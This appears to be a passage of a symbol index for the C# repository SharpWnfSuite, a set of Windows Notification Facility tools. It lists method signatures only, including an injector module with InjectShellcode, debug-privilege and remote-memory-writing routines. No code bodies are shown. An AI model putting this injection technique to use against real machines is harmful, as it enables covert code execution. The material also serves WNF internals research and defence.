type KEY_VALUE_INFORMATION_CLASS (line 100) | internal enum KEY_VALUE_INFORMATION_CLASS
type OBJECT_ATTRIBUTES_FLAGS (line 111) | [Flags]
type REG_VALUE_TYPE (line 131) | internal enum REG_VALUE_TYPE
type SECURITY_DESCRIPTOR_CONTROL (line 147) | [Flags]
type WNF_DATA_SCOPE (line 167) | internal enum WNF_DATA_SCOPE : uint
type WNF_STATE_NAME_LIFETIME (line 178) | internal enum WNF_STATE_NAME_LIFETIME : uint
FILE: SharpWnfSuite/SharpWnfClient/Interop/Win32Structs.cs
type ACCESS_ALLOWED_ACE (line 7) | [StructLayout(LayoutKind.Sequential)]
type ACE_HEADER (line 15) | [StructLayout(LayoutKind.Sequential)]
type ACL (line 23) | [StructLayout(LayoutKind.Sequential)]
type KEY_VALUE_FULL_INFORMATION (line 33) | [StructLayout(LayoutKind.Sequential)]
type LARGE_INTEGER (line 45) | [StructLayout(LayoutKind.Explicit, Size = 8)]
method LARGE_INTEGER (line 55) | public LARGE_INTEGER(int _low, int _high)
method LARGE_INTEGER (line 62) | public LARGE_INTEGER(long _quad)
method ToInt64 (line 69) | public long ToInt64()
method FromInt64 (line 74) | public static LARGE_INTEGER FromInt64(long value)
type OBJECT_ATTRIBUTES (line 84) | [StructLayout(LayoutKind.Sequential)]
method OBJECT_ATTRIBUTES (line 94) | public OBJECT_ATTRIBUTES(
method Dispose (line 126) | public void Dispose()
type SECURITY_DESCRIPTOR (line 137) | [StructLayout(LayoutKind.Sequential)]
type UNICODE_STRING (line 149) | [StructLayout(LayoutKind.Sequential)]
method UNICODE_STRING (line 156) | public UNICODE_STRING(string s)
method Dispose (line 178) | public void Dispose()
method ToString (line 184) | public override string ToString()
method GetBuffer (line 189) | public IntPtr GetBuffer()
method SetBuffer (line 194) | public void SetBuffer(IntPtr _buffer)
type WNF_STATE_NAME (line 200) | [StructLayout(LayoutKind.Sequential)]
method WNF_STATE_NAME (line 205) | public WNF_STATE_NAME(
method GetVersion (line 222) | public uint GetVersion()
method GetNameLifeTime (line 227) | public WNF_STATE_NAME_LIFETIME GetNameLifeTime()
method GetDataScope (line 232) | public WNF_DATA_SCOPE GetDataScope()
method GetPermanentData (line 237) | public uint GetPermanentData()
method GetSequenceNumber (line 242) | public uint GetSequenceNumber()
method GetOwnerTag (line 247) | public uint GetOwnerTag()
method SetVersion (line 252) | public void SetVersion(uint version)
method SetNameLifeTime (line 260) | public void SetNameLifeTime(WNF_STATE_NAME_LIFETIME nameLifeTime)
method SetDataScope (line 268) | public void SetDataScope(uint dataScope)
method SetPermanentData (line 276) | public void SetPermanentData(uint parmanentData)
method SetSequenceNumber (line 284) | public void SetSequenceNumber(uint sequenceNumber)
method SetOwnerTag (line 292) | public void SetOwnerTag(uint ownerTag)
method IsValid (line 300) | public bool IsValid()
FILE: SharpWnfSuite/SharpWnfClient/Library/HexDump.cs
class HexDump (line 7) | internal class HexDump
method Dump (line 9) | public static string Dump(byte[] data, int nIndentCount)
method Dump (line 22) | public static string Dump(byte[] data, uint nRange, int nIndentCount)
method Dump (line 35) | public static string Dump(byte[] data, IntPtr pBaseAddress, uint nRang...
method Dump (line 48) | public static string Dump(IntPtr pBufferToRead, uint nRange, int nInde...
method Dump (line 54) | public static string Dump(IntPtr pBufferToRead, IntPtr pBaseAddress, u...
method IsPrintable (line 112) | private static bool IsPrintable(char code)
FILE: SharpWnfSuite/SharpWnfClient/Library/WnfCom.cs
class WnfCom (line 11) | internal class WnfCom : IDisposable
type NotifyContext (line 16) | private struct NotifyContext
method WnfCom (line 47) | public WnfCom()
method Dispose (line 69) | public void Dispose() { }
method CreateServer (line 74) | public ulong CreateServer()
method Listen (line 101) | public bool Listen()
method PrintInternalName (line 172) | public void PrintInternalName()
method Read (line 191) | public bool Read(out int nChangeStamp, out IntPtr pInfoBuffer, out uin...
method Write (line 233) | public bool Write(byte[] data)
method SetStateName (line 263) | public bool SetStateName(string stateName)
method GetOsVersionNumbers (line 273) | private static bool GetOsVersionNumbers(out int nMajorVersion, out int...
method GetOsVersionString (line 373) | private static string GetOsVersionString(int nMajorVersion, int nMinor...
method GetWnfStateName (line 434) | private ulong GetWnfStateName(string name)
method GetWorldAllowedSecurityDescriptor (line 498) | private IntPtr GetWorldAllowedSecurityDescriptor()
method NotifyCallback (line 554) | private int NotifyCallback(
FILE: SharpWnfSuite/SharpWnfClient/SharpWnfClient.cs
class SharpWnfClient (line 6) | internal class SharpWnfClient
method Main (line 8) | static void Main(string[] args)
FILE: SharpWnfSuite/SharpWnfDump/Handler/CommandLineParser.cs
class CommandLineParser (line 7) | internal class CommandLineParser
class CommandLineOption (line 9) | private class CommandLineOption
method CommandLineOption (line 20) | public CommandLineOption(
method CommandLineOption (line 36) | public CommandLineOption(
method GetBriefName (line 57) | public string GetBriefName()
method GetDescription (line 62) | public string GetDescription()
method GetFlag (line 67) | public bool GetFlag()
method GetFullName (line 76) | public string GetFullName()
method GetIsParsed (line 81) | public bool GetIsParsed()
method GetIsRequired (line 86) | public bool GetIsRequired()
method GetOptionType (line 91) | public OptionType GetOptionType()
method GetValue (line 96) | public string GetValue()
method SetFlag (line 105) | public void SetFlag()
method SetIsParsed (line 110) | public void SetIsParsed()
method SetValue (line 115) | public void SetValue(string _value)
type OptionType (line 121) | private enum OptionType
method AddArgument (line 135) | public void AddArgument(
method AddFlag (line 161) | public void AddFlag(
method AddParameter (line 193) | public void AddParameter(
method AddExclusive (line 227) | public void AddExclusive(List<string> exclusive)
method GetFlag (line 233) | public bool GetFlag(string key)
method GetHelp (line 254) | public void GetHelp()
method GetValue (line 302) | public string GetValue(string key)
method ListOptions (line 323) | public void ListOptions()
method Parse (line 380) | public string[] Parse(string[] args)
method SetOptionName (line 506) | public void SetOptionName(string optionName)
method SetTitle (line 512) | public void SetTitle(string title)
FILE: SharpWnfSuite/SharpWnfDump/Handler/Execute.cs
class Execute (line 6) | internal class Execute
method Run (line 8) | public static void Run(CommandLineParser options)
FILE: SharpWnfSuite/SharpWnfDump/Interop/NativeMethods.cs
class NativeMethods (line 9) | internal class NativeMethods
method ConvertSecurityDescriptorToStringSecurityDescriptor (line 14) | [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unic...
method GetSecurityDescriptorLength (line 22) | [DllImport("advapi32.dll", SetLastError = true)]
method IsValidSecurityDescriptor (line 25) | [DllImport("advapi32.dll", SetLastError = true)]
method NtClose (line 35) | [DllImport("ntdll.dll")]
method NtEnumerateValueKey (line 38) | [DllImport("ntdll.dll")]
method NtOpenKey (line 47) | [DllImport("ntdll.dll")]
method NtQueryValueKey (line 53) | [DllImport("ntdll.dll")]
method NtQueryWnfStateData (line 62) | [DllImport("ntdll.dll")]
method NtQueryWnfStateNameInformation (line 71) | [DllImport("ntdll.dll")]
method NtUpdateWnfStateData (line 79) | [DllImport("ntdll.dll")]
FILE: SharpWnfSuite/SharpWnfDump/Interop/WellKnownStateName1507.cs
type WELL_KNOWN_WNF_NAME_1507 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1507 : ulong
FILE: SharpWnfSuite/SharpWnfDump/Interop/WellKnownStateName1511.cs
type WELL_KNOWN_WNF_NAME_1511 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1511 : ulong
FILE: SharpWnfSuite/SharpWnfDump/Interop/WellKnownStateName1607.cs
type WELL_KNOWN_WNF_NAME_1607 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1607 : ulong
FILE: SharpWnfSuite/SharpWnfDump/Interop/WellKnownStateName1703.cs
type WELL_KNOWN_WNF_NAME_1703 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1703 : ulong
FILE: SharpWnfSuite/SharpWnfDump/Interop/WellKnownStateName1709.cs
type WELL_KNOWN_WNF_NAME_1709 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1709 : ulong
FILE: SharpWnfSuite/SharpWnfDump/Interop/WellKnownStateName1803.cs
type WELL_KNOWN_WNF_NAME_1803 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1803 : ulong
FILE: SharpWnfSuite/SharpWnfDump/Interop/WellKnownStateName1809.cs
type WELL_KNOWN_WNF_NAME_1809 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1809 : ulong
FILE: SharpWnfSuite/SharpWnfDump/Interop/WellKnownStateName1903To1909.cs
type WELL_KNOWN_WNF_NAME_1903_TO_1909 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1903_TO_1909 : ulong
FILE: SharpWnfSuite/SharpWnfDump/Interop/WellKnownStateName2004To21H1.cs
type WELL_KNOWN_WNF_NAME_2004_TO_21H1 (line 3) | internal enum WELL_KNOWN_WNF_NAME_2004_TO_21H1 : ulong
FILE: SharpWnfSuite/SharpWnfDump/Interop/WellKnownStateName2022.cs
type WELL_KNOWN_WNF_NAME_2022 (line 3) | internal enum WELL_KNOWN_WNF_NAME_2022 : ulong
FILE: SharpWnfSuite/SharpWnfDump/Interop/WellKnownStateName21H2.cs
type WELL_KNOWN_WNF_NAME_21H2 (line 3) | internal enum WELL_KNOWN_WNF_NAME_21H2 : ulong
FILE: SharpWnfSuite/SharpWnfDump/Interop/WellKnownStateName22H2.cs
type WELL_KNOWN_WNF_NAME_22H2 (line 3) | internal enum WELL_KNOWN_WNF_NAME_22H2 : ulong
FILE: SharpWnfSuite/SharpWnfDump/Interop/WellKnownStateName23H2.cs
type WELL_KNOWN_WNF_NAME_23H2 (line 3) | internal enum WELL_KNOWN_WNF_NAME_23H2 : ulong
FILE: SharpWnfSuite/SharpWnfDump/Interop/WellKnownStateName24H2.cs
type WELL_KNOWN_WNF_NAME_24H2 (line 3) | internal enum WELL_KNOWN_WNF_NAME_24H2 : ulong
FILE: SharpWnfSuite/SharpWnfDump/Interop/Win32Consts.cs
class Win32Consts (line 7) | internal class Win32Consts
FILE: SharpWnfSuite/SharpWnfDump/Interop/Win32Enums.cs
type ACCESS_MASK (line 5) | [Flags]
type KEY_VALUE_INFORMATION_CLASS (line 37) | internal enum KEY_VALUE_INFORMATION_CLASS
type OBJECT_ATTRIBUTES_FLAGS (line 48) | [Flags]
type REG_VALUE_TYPE (line 68) | internal enum REG_VALUE_TYPE
type SECURITY_INFORMATION (line 84) | [Flags]
type WNF_STATE_NAME_LIFETIME (line 98) | internal enum WNF_STATE_NAME_LIFETIME : uint
type WNF_DATA_SCOPE (line 107) | internal enum WNF_DATA_SCOPE : uint
type WNF_STATE_NAME_INFORMATION (line 118) | internal enum WNF_STATE_NAME_INFORMATION : uint
FILE: SharpWnfSuite/SharpWnfDump/Interop/Win32Structs.cs
type KEY_VALUE_FULL_INFORMATION (line 7) | [StructLayout(LayoutKind.Sequential)]
type OBJECT_ATTRIBUTES (line 19) | [StructLayout(LayoutKind.Sequential)]
method OBJECT_ATTRIBUTES (line 29) | public OBJECT_ATTRIBUTES(
method Dispose (line 61) | public void Dispose()
type UNICODE_STRING (line 72) | [StructLayout(LayoutKind.Sequential)]
method UNICODE_STRING (line 79) | public UNICODE_STRING(string s)
method Dispose (line 101) | public void Dispose()
method ToString (line 107) | public override string ToString()
method GetBuffer (line 112) | public IntPtr GetBuffer()
method SetBuffer (line 117) | public void SetBuffer(IntPtr _buffer)
type WNF_STATE_NAME (line 123) | [StructLayout(LayoutKind.Sequential)]
method WNF_STATE_NAME (line 128) | public WNF_STATE_NAME(
method GetVersion (line 145) | public uint GetVersion()
method GetNameLifeTime (line 150) | public WNF_STATE_NAME_LIFETIME GetNameLifeTime()
method GetDataScope (line 155) | public WNF_DATA_SCOPE GetDataScope()
method GetPermanentData (line 160) | public uint GetPermanentData()
method GetSequenceNumber (line 165) | public uint GetSequenceNumber()
method GetOwnerTag (line 170) | public uint GetOwnerTag()
method SetVersion (line 175) | public void SetVersion(uint version)
method SetNameLifeTime (line 183) | public void SetNameLifeTime(WNF_STATE_NAME_LIFETIME nameLifeTime)
method SetDataScope (line 191) | public void SetDataScope(uint dataScope)
method SetPermanentData (line 199) | public void SetPermanentData(uint parmanentData)
method SetSequenceNumber (line 207) | public void SetSequenceNumber(uint sequenceNumber)
method SetOwnerTag (line 215) | public void SetOwnerTag(uint ownerTag)
method IsValid (line 223) | public bool IsValid()
FILE: SharpWnfSuite/SharpWnfDump/Library/Globals.cs
class Globals (line 5) | internal class Globals
method Globals (line 19) | static Globals()
FILE: SharpWnfSuite/SharpWnfDump/Library/Helpers.cs
class Helpers (line 11) | internal class Helpers
method DumpWnfData (line 13) | public static string DumpWnfData(
method GetOsVersionNumbers (line 112) | public static bool GetOsVersionNumbers(out int nMajorVersion, out int ...
method GetOsVersionString (line 212) | public static string GetOsVersionString(int nMajorVersion, int nMinorV...
method GetWnfName (line 273) | public static string GetWnfName(ulong stateName)
method GetWnfStateName (line 341) | public static ulong GetWnfStateName(string name)
method IsWritableWnfStateName (line 404) | public static bool IsWritableWnfStateName(ulong stateName)
method GetWnfSubscribersPresenceInfo (line 419) | public static int GetWnfSubscribersPresenceInfo(ulong stateName)
method ReadWnfData (line 435) | public static bool ReadWnfData(
method WriteWnfData (line 466) | public static bool WriteWnfData(ulong stateName, IntPtr pDataBuffer, i...
FILE: SharpWnfSuite/SharpWnfDump/Library/HexDump.cs
class HexDump (line 7) | internal class HexDump
method Dump (line 9) | public static string Dump(byte[] data, int nIndentCount)
method Dump (line 22) | public static string Dump(byte[] data, uint nRange, int nIndentCount)
method Dump (line 35) | public static string Dump(byte[] data, IntPtr pBaseAddress, uint nRang...
method Dump (line 48) | public static string Dump(IntPtr pBufferToRead, uint nRange, int nInde...
method Dump (line 54) | public static string Dump(IntPtr pBufferToRead, IntPtr pBaseAddress, u...
method IsPrintable (line 112) | private static bool IsPrintable(char code)
FILE: SharpWnfSuite/SharpWnfDump/Library/Modules.cs
class Modules (line 11) | internal class Modules
method BruteForceWnfNames (line 13) | public static void BruteForceWnfNames(bool bShowData, bool bUsedOnly)
method DumpKeyInfo (line 57) | public static bool DumpKeyInfo(ulong stateName, bool bShowSd, bool bSh...
method DumpWnfNames (line 143) | public static void DumpWnfNames(bool bShowSd, bool bShowData, bool bUs...
method OperationRead (line 249) | public static void OperationRead(ulong stateName)
method OperationWrite (line 286) | public static void OperationWrite(ulong stateName, string filePath)
FILE: SharpWnfSuite/SharpWnfDump/SharpWnfDump.cs
class SharpWnfDump (line 8) | class SharpWnfDump
method Main (line 10) | static void Main(string[] args)
FILE: SharpWnfSuite/SharpWnfInject/Handler/CommandLineParser.cs
class CommandLineParser (line 7) | internal class CommandLineParser
class CommandLineOption (line 9) | private class CommandLineOption
method CommandLineOption (line 20) | public CommandLineOption(
method CommandLineOption (line 36) | public CommandLineOption(
method GetBriefName (line 57) | public string GetBriefName()
method GetDescription (line 62) | public string GetDescription()
method GetFlag (line 67) | public bool GetFlag()
method GetFullName (line 76) | public string GetFullName()
method GetIsParsed (line 81) | public bool GetIsParsed()
method GetIsRequired (line 86) | public bool GetIsRequired()
method GetOptionType (line 91) | public OptionType GetOptionType()
method GetValue (line 96) | public string GetValue()
method SetFlag (line 105) | public void SetFlag()
method SetIsParsed (line 110) | public void SetIsParsed()
method SetValue (line 115) | public void SetValue(string _value)
type OptionType (line 121) | private enum OptionType
method AddArgument (line 135) | public void AddArgument(
method AddFlag (line 161) | public void AddFlag(
method AddParameter (line 193) | public void AddParameter(
method AddExclusive (line 227) | public void AddExclusive(List<string> exclusive)
method GetFlag (line 233) | public bool GetFlag(string key)
method GetHelp (line 254) | public void GetHelp()
method GetValue (line 302) | public string GetValue(string key)
method ListOptions (line 323) | public void ListOptions()
method Parse (line 380) | public string[] Parse(string[] args)
method SetOptionName (line 506) | public void SetOptionName(string optionName)
method SetTitle (line 512) | public void SetTitle(string title)
FILE: SharpWnfSuite/SharpWnfInject/Handler/Execute.cs
class Execute (line 7) | internal class Execute
method Run (line 9) | public static void Run(CommandLineParser options)
FILE: SharpWnfSuite/SharpWnfInject/Interop/NativeMethods.cs
class NativeMethods (line 9) | internal class NativeMethods
method SymCleanup (line 14) | [DllImport("Dbghelp.dll", SetLastError = true)]
method SymFromAddr (line 17) | [DllImport("Dbghelp.dll", SetLastError = true)]
method SymSetOptions (line 24) | [DllImport("Dbghelp.dll", SetLastError = true)]
method SymInitialize (line 28) | [DllImport("Dbghelp.dll", SetLastError = true)]
method NtAdjustPrivilegesToken (line 41) | [DllImport("ntdll.dll")]
method NtAllocateVirtualMemory (line 50) | [DllImport("ntdll.dll")]
method NtClose (line 59) | [DllImport("ntdll.dll")]
method NtFreeVirtualMemory (line 62) | [DllImport("ntdll.dll")]
method NtOpenKey (line 69) | [DllImport("ntdll.dll")]
method NtOpenProcess (line 75) | [DllImport("ntdll.dll")]
method NtOpenSymbolicLinkObject (line 82) | [DllImport("ntdll.dll")]
method NtProtectVirtualMemory (line 88) | [DllImport("ntdll.dll")]
method NtQueryInformationProcess (line 96) | [DllImport("ntdll.dll")]
method NtQuerySymbolicLinkObject (line 104) | [DllImport("ntdll.dll")]
method NtQueryValueKey (line 110) | [DllImport("ntdll.dll")]
method NtQueryVirtualMemory (line 119) | [DllImport("ntdll.dll")]
method NtReadVirtualMemory (line 128) | [DllImport("ntdll.dll")]
method NtUpdateWnfStateData (line 136) | [DllImport("ntdll.dll")]
method NtWriteVirtualMemory (line 146) | [DllImport("ntdll.dll")]
method RtlGetNtVersionNumbers (line 154) | [DllImport("ntdll.dll")]
FILE: SharpWnfSuite/SharpWnfInject/Interop/WellKnownStateName1507.cs
type WELL_KNOWN_WNF_NAME_1507 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1507 : ulong
FILE: SharpWnfSuite/SharpWnfInject/Interop/WellKnownStateName1511.cs
type WELL_KNOWN_WNF_NAME_1511 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1511 : ulong
FILE: SharpWnfSuite/SharpWnfInject/Interop/WellKnownStateName1607.cs
type WELL_KNOWN_WNF_NAME_1607 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1607 : ulong
FILE: SharpWnfSuite/SharpWnfInject/Interop/WellKnownStateName1703.cs
type WELL_KNOWN_WNF_NAME_1703 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1703 : ulong
FILE: SharpWnfSuite/SharpWnfInject/Interop/WellKnownStateName1709.cs
type WELL_KNOWN_WNF_NAME_1709 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1709 : ulong
FILE: SharpWnfSuite/SharpWnfInject/Interop/WellKnownStateName1803.cs
type WELL_KNOWN_WNF_NAME_1803 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1803 : ulong
FILE: SharpWnfSuite/SharpWnfInject/Interop/WellKnownStateName1809.cs
type WELL_KNOWN_WNF_NAME_1809 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1809 : ulong
FILE: SharpWnfSuite/SharpWnfInject/Interop/WellKnownStateName1903To1909.cs
type WELL_KNOWN_WNF_NAME_1903_TO_1909 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1903_TO_1909 : ulong
FILE: SharpWnfSuite/SharpWnfInject/Interop/WellKnownStateName2004To21H1.cs
type WELL_KNOWN_WNF_NAME_2004_TO_21H1 (line 3) | internal enum WELL_KNOWN_WNF_NAME_2004_TO_21H1 : ulong
FILE: SharpWnfSuite/SharpWnfInject/Interop/WellKnownStateName2022.cs
type WELL_KNOWN_WNF_NAME_2022 (line 3) | internal enum WELL_KNOWN_WNF_NAME_2022 : ulong
FILE: SharpWnfSuite/SharpWnfInject/Interop/WellKnownStateName21H2.cs
type WELL_KNOWN_WNF_NAME_21H2 (line 3) | internal enum WELL_KNOWN_WNF_NAME_21H2 : ulong
FILE: SharpWnfSuite/SharpWnfInject/Interop/WellKnownStateName22H2.cs
type WELL_KNOWN_WNF_NAME_22H2 (line 3) | internal enum WELL_KNOWN_WNF_NAME_22H2 : ulong
FILE: SharpWnfSuite/SharpWnfInject/Interop/WellKnownStateName23H2.cs
type WELL_KNOWN_WNF_NAME_23H2 (line 3) | internal enum WELL_KNOWN_WNF_NAME_23H2 : ulong
FILE: SharpWnfSuite/SharpWnfInject/Interop/WellKnownStateName24H2.cs
type WELL_KNOWN_WNF_NAME_24H2 (line 3) | internal enum WELL_KNOWN_WNF_NAME_24H2 : ulong
FILE: SharpWnfSuite/SharpWnfInject/Interop/Win32Consts.cs
class Win32Consts (line 7) | internal class Win32Consts
FILE: SharpWnfSuite/SharpWnfInject/Interop/Win32Delegates.cs
class Win32Delegates (line 6) | internal class Win32Delegates
FILE: SharpWnfSuite/SharpWnfInject/Interop/Win32Enums.cs
type ACCESS_MASK (line 5) | [Flags]
type ALLOCATION_TYPE (line 60) | [Flags]
type BOOLEAN (line 74) | internal enum BOOLEAN : byte
type IMAGE_FILE_MACHINE (line 80) | internal enum IMAGE_FILE_MACHINE : ushort
type KEY_VALUE_INFORMATION_CLASS (line 116) | internal enum KEY_VALUE_INFORMATION_CLASS
type MEMORY_ALLOCATION_TYPE (line 127) | [Flags]
type MEMORY_INFORMATION_CLASS (line 152) | internal enum MEMORY_INFORMATION_CLASS
type MEMORY_PROTECTION (line 171) | [Flags]
type OBJECT_ATTRIBUTES_FLAGS (line 188) | [Flags]
type PrivilegeAttributeFlags (line 208) | [Flags]
type PROCESSINFOCLASS (line 216) | internal enum PROCESSINFOCLASS
type REG_VALUE_TYPE (line 333) | internal enum REG_VALUE_TYPE
type SectionFlags (line 349) | public enum SectionFlags : uint
type SYM_OPTIONS (line 390) | [Flags]
type WNF_STATE_NAME_LIFETIME (line 421) | internal enum WNF_STATE_NAME_LIFETIME : uint
type WNF_DATA_SCOPE (line 430) | internal enum WNF_DATA_SCOPE : uint
type WNF_STATE_NAME_INFORMATION (line 441) | internal enum WNF_STATE_NAME_INFORMATION : uint
FILE: SharpWnfSuite/SharpWnfInject/Interop/Win32Structs.cs
type CLIENT_ID (line 10) | [StructLayout(LayoutKind.Sequential)]
type IMAGE_SECTION_HEADER (line 17) | [StructLayout(LayoutKind.Sequential, Pack = 1)]
type KEY_VALUE_FULL_INFORMATION (line 33) | [StructLayout(LayoutKind.Sequential)]
type LIST_ENTRY32 (line 45) | [StructLayout(LayoutKind.Sequential)]
type LIST_ENTRY64 (line 52) | [StructLayout(LayoutKind.Sequential)]
type LUID (line 59) | [StructLayout(LayoutKind.Sequential)]
method LUID (line 65) | public LUID(uint _lowPart, uint _highPart)
type LUID_AND_ATTRIBUTES (line 72) | [StructLayout(LayoutKind.Sequential, Pack = 4)]
type MEMORY_BASIC_INFORMATION (line 79) | [StructLayout(LayoutKind.Sequential)]
type OBJECT_ATTRIBUTES (line 91) | [StructLayout(LayoutKind.Sequential)]
method OBJECT_ATTRIBUTES (line 101) | public OBJECT_ATTRIBUTES(
method Dispose (line 133) | public void Dispose()
type PROCESS_BASIC_INFORMATION (line 144) | [StructLayout(LayoutKind.Sequential)]
type PROCESS_DEVICEMAP_INFORMATION (line 155) | [StructLayout(LayoutKind.Sequential)]
type RTL_BALANCED_NODE32 (line 163) | [StructLayout(LayoutKind.Sequential)]
type RTL_BALANCED_NODE64 (line 171) | [StructLayout(LayoutKind.Sequential)]
type RTL_RB_TREE32 (line 179) | [StructLayout(LayoutKind.Sequential)]
type RTL_RB_TREE64 (line 186) | [StructLayout(LayoutKind.Sequential)]
type SYMBOL_INFO (line 193) | [StructLayout(LayoutKind.Sequential)]
type TOKEN_PRIVILEGES (line 215) | [StructLayout(LayoutKind.Sequential)]
method TOKEN_PRIVILEGES (line 222) | public TOKEN_PRIVILEGES(int _privilegeCount)
type UNICODE_STRING (line 229) | [StructLayout(LayoutKind.Sequential)]
method UNICODE_STRING (line 236) | public UNICODE_STRING(string s)
method Dispose (line 258) | public void Dispose()
method ToString (line 264) | public override string ToString()
method GetBuffer (line 272) | public IntPtr GetBuffer()
method SetBuffer (line 277) | public void SetBuffer(IntPtr _buffer)
type WNF_CONTEXT_HEADER (line 283) | [StructLayout(LayoutKind.Sequential)]
type WNF_DELIVERY_DESCRIPTOR (line 290) | [StructLayout(LayoutKind.Sequential)]
type WNF_NAME_SUBSCRIPTION32 (line 302) | [StructLayout(LayoutKind.Sequential)]
type WNF_NAME_SUBSCRIPTION32_WIN11 (line 321) | [StructLayout(LayoutKind.Sequential)]
type WNF_NAME_SUBSCRIPTION64 (line 340) | [StructLayout(LayoutKind.Sequential)]
type WNF_NAME_SUBSCRIPTION64_WIN11 (line 359) | [StructLayout(LayoutKind.Sequential)]
type WNF_SERIALIZATION_GROUP32 (line 378) | [StructLayout(LayoutKind.Sequential)]
type WNF_SERIALIZATION_GROUP64 (line 388) | [StructLayout(LayoutKind.Sequential)]
type WNF_STATE_NAME (line 398) | [StructLayout(LayoutKind.Sequential)]
method WNF_STATE_NAME (line 403) | public WNF_STATE_NAME(
method GetVersion (line 420) | public uint GetVersion()
method GetNameLifeTime (line 425) | public WNF_STATE_NAME_LIFETIME GetNameLifeTime()
method GetDataScope (line 430) | public WNF_DATA_SCOPE GetDataScope()
method GetPermanentData (line 435) | public uint GetPermanentData()
method GetSequenceNumber (line 440) | public uint GetSequenceNumber()
method GetOwnerTag (line 445) | public uint GetOwnerTag()
method SetVersion (line 450) | public void SetVersion(uint version)
method SetNameLifeTime (line 458) | public void SetNameLifeTime(WNF_STATE_NAME_LIFETIME nameLifeTime)
method SetDataScope (line 466) | public void SetDataScope(uint dataScope)
method SetPermanentData (line 474) | public void SetPermanentData(uint parmanentData)
method SetSequenceNumber (line 482) | public void SetSequenceNumber(uint sequenceNumber)
method SetOwnerTag (line 490) | public void SetOwnerTag(uint ownerTag)
method IsValid (line 498) | public bool IsValid()
type WNF_SUBSCRIPTION_TABLE32 (line 507) | [StructLayout(LayoutKind.Sequential)]
type WNF_SUBSCRIPTION_TABLE32_WIN11 (line 524) | [StructLayout(LayoutKind.Sequential)]
type WNF_SUBSCRIPTION_TABLE64 (line 541) | [StructLayout(LayoutKind.Sequential)]
type WNF_SUBSCRIPTION_TABLE64_WIN11 (line 558) | [StructLayout(LayoutKind.Sequential)]
type WNF_SUBSCRIPTION_TABLE64_WIN11_24H2 (line 575) | [StructLayout(LayoutKind.Sequential)]
type WNF_USER_SUBSCRIPTION32 (line 592) | [StructLayout(LayoutKind.Sequential)]
type WNF_USER_SUBSCRIPTION64 (line 610) | [StructLayout(LayoutKind.Sequential)]
type WNF_TYPE_ID (line 628) | [StructLayout(LayoutKind.Sequential)]
FILE: SharpWnfSuite/SharpWnfInject/Library/Globals.cs
class Globals (line 3) | internal class Globals
method Globals (line 12) | static Globals()
FILE: SharpWnfSuite/SharpWnfInject/Library/Helpers.cs
class Helpers (line 14) | internal class Helpers
method GetDeviceMap (line 16) | public static Dictionary<string, string> GetDeviceMap()
method GetOsVersionNumbers (line 85) | public static bool GetOsVersionNumbers(out int nMajorVersion, out int ...
method GetOsVersionString (line 185) | public static string GetOsVersionString(int nMajorVersion, int nMinorV...
method GetPebBase (line 246) | public static IntPtr GetPebBase(IntPtr hProcess, out IntPtr pPebWow32)
method GetProcessArchitecture (line 285) | public static IMAGE_FILE_MACHINE GetProcessArchitecture(IntPtr hProcess)
method GetProcessImageFileName (line 366) | public static string GetProcessImageFileName(IntPtr hProcess)
method GetProcessModules (line 407) | public static Dictionary<string, IntPtr> GetProcessModules(
method GetModuleSectionHeaders (line 568) | public static Dictionary<string, IMAGE_SECTION_HEADER> GetModuleSectio...
method GetSymbolPath (line 663) | public static string GetSymbolPath(IntPtr hProcess, IntPtr pBuffer)
method GetWellKnownWnfName (line 725) | public static string GetWellKnownWnfName(ulong stateName)
method GetWnfStateName (line 789) | public static ulong GetWnfStateName(string name)
method Is32BitProcess (line 853) | public static bool Is32BitProcess(IntPtr hProcess)
method IsWin11 (line 876) | public static bool IsWin11()
method IsHeapAddress (line 883) | public static bool IsHeapAddress(IntPtr hProcess, IntPtr pBuffer)
FILE: SharpWnfSuite/SharpWnfInject/Library/Modules.cs
class Modules (line 13) | internal class Modules
method InjectShellcode (line 15) | public static bool InjectShellcode(
method InjectShellcode (line 44) | public static bool InjectShellcode(
FILE: SharpWnfSuite/SharpWnfInject/Library/Utilities.cs
class Utilities (line 11) | internal class Utilities
method EnableDebugPrivilege (line 13) | public static bool EnableDebugPrivilege()
method GetNameSubscriptions (line 36) | public static Dictionary<ulong, IntPtr> GetNameSubscriptions(
method GetNameSubscriptionsWin11 (line 138) | public static Dictionary<ulong, IntPtr> GetNameSubscriptionsWin11(
method GetSubscriptionTable (line 199) | public static IntPtr GetSubscriptionTable(IntPtr hProcess, IntPtr pTab...
method GetSubscriptionTablePointerAddress (line 272) | public static IntPtr GetSubscriptionTablePointerAddress(IntPtr hProcess)
method GetUserSubscriptions (line 393) | public static Dictionary<IntPtr, KeyValuePair<IntPtr, IntPtr>> GetUser...
method ListWin11NameSubscriptions (line 542) | public static void ListWin11NameSubscriptions(
FILE: SharpWnfSuite/SharpWnfInject/SharpWnfInject.cs
class SharpWnfInject (line 6) | internal class SharpWnfInject
method Main (line 8) | static void Main(string[] args)
FILE: SharpWnfSuite/SharpWnfNameDumper/Handler/CommandLineParser.cs
class CommandLineParser (line 7) | internal class CommandLineParser
class CommandLineOption (line 9) | private class CommandLineOption
method CommandLineOption (line 20) | public CommandLineOption(
method CommandLineOption (line 36) | public CommandLineOption(
method GetBriefName (line 57) | public string GetBriefName()
method GetDescription (line 62) | public string GetDescription()
method GetFlag (line 67) | public bool GetFlag()
method GetFullName (line 76) | public string GetFullName()
method GetIsParsed (line 81) | public bool GetIsParsed()
method GetIsRequired (line 86) | public bool GetIsRequired()
method GetOptionType (line 91) | public OptionType GetOptionType()
method GetValue (line 96) | public string GetValue()
method SetFlag (line 105) | public void SetFlag()
method SetIsParsed (line 110) | public void SetIsParsed()
method SetValue (line 115) | public void SetValue(string _value)
